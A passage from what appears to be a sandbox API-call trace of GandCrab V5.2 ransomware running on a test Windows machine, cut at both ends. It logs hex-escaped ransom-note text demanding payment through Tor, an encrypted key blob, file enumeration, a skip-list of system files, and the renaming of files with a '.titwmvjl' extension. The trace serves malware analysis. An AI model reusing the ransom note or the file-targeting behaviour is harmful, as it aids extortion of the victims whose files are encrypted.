2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.230] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0072.231] CloseHandle (hObject=0x2d4) returned 1 [0072.231] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.231] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.232] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x21f)) [0072.232] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.232] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.232] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.233] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a09d2ca4deb61a.lock") returned 136 [0072.233] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0072.233] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.233] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 112 [0072.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0072.233] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x5033f8 [0072.234] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.234] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.234] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.234] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.234] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.234] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.234] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.234] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a09d2ca4deb61a.lock" [0072.234] lstrlenW (lpString=".titwmvjl") returned 9 [0072.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a09d2ca4deb61a.lock") returned 136 [0072.234] VirtualAlloc (lpAddress=0x0, dwSize=0x150, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.234] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 145 [0072.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a09d2ca4deb61a.lock") returned 136 [0072.234] lstrlenW (lpString=".lock") returned 5 [0072.234] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.235] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.235] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.235] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.235] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.235] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.235] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.235] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\TITWMVJL-DECRYPT.txt" [0072.235] lstrlenW (lpString=".titwmvjl") returned 9 [0072.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\TITWMVJL-DECRYPT.txt") returned 132 [0072.235] VirtualAlloc (lpAddress=0x0, dwSize=0x148, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.235] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 141 [0072.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\TITWMVJL-DECRYPT.txt") returned 132 [0072.235] lstrlenW (lpString=".txt") returned 4 [0072.235] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.236] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.236] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.236] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\TITWMVJL-DECRYPT.txt") returned 132 [0072.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\TITWMVJL-DECRYPT.txt") returned 132 [0072.236] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.236] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.236] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.236] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.236] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.236] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.236] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.236] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.236] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.236] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0072.236] FindClose (in: hFindFile=0x5033f8 | out: hFindFile=0x5033f8) returned 1 [0072.237] CloseHandle (hObject=0x2d4) returned 1 [0072.238] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.238] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0072.238] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0072.238] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="TaskBar" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0072.238] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0072.238] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.239] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.239] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.239] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.239] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.239] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.239] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\TITWMVJL-DECRYPT.txt") returned 120 [0072.239] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0072.240] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\